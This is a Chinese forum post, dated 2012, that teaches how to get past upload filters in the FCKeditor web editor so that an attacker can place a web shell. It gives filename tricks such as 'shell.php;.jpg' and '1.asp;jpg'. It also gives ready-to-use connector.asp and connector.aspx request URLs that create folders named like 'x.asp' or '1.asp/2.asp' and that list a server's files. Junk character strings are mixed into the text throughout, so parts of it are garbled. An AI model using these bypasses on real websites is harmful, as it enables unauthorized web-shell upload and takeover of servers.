很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg
* U2 o' P. A# D4 W. _# P+ R
' N+ R$ g. _6 h提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。, S# A2 A5 C. x- U6 m) P# C
" R9 ^! a% W1 e
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。; E4 B: j- A2 R' Q7 S
, X8 L/ P2 W7 C, w0 _, D$ O
突破建立文件夹:* @9 Q. f. \, a% `* ^ u
) Q- w) |, `/ P+ b. p
editor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp R2 V K8 L% Z) K7 G
$ K$ e, d+ m4 G' C+ u# w5 v参数:( p1 B2 b( ]4 o& t
5 q. u% @& |8 Y
当前目录名:CurrentFolder=/qing.asp, d6 q$ @ F' H; f) n5 _9 H
( @6 l6 o9 l. x6 y新的目录名:NewFolderName=x.asp
6 y! b R% v5 S4 x% @3 I2 i
) P, K) i) a1 k9 \' |其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……
: A c/ v7 \+ v$ q9 H' Q
1 o, a% { b4 m* E1 i) `那么 x.asp 就已经建立生成了,此方法百试百灵!
/ U l9 k- w( N; ]& I1 Z' I
5 n t2 N7 M4 `/ l" T9 ~8 c/ W! W+ L新建文件夹参数 x.asp,基本都能搞定。
2 T: C& z2 B% b% A: i( k8 Z( m# a' p; {
下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建
8 [% V# ^3 F4 l" e w4 D! D3 W
( n3 s% { E6 f9 @1 \& }aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp% B3 `7 O& z) z" z `
- R c9 e% x {: l获取文件列表
3 j- E9 E; P$ M4 z aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
# e! [- F. J- h. d* @6 D4 G7 n' w0 M4 i! ~1 U+ _
|
发表于 2012-12-31 09:27:09
收藏
支持
反对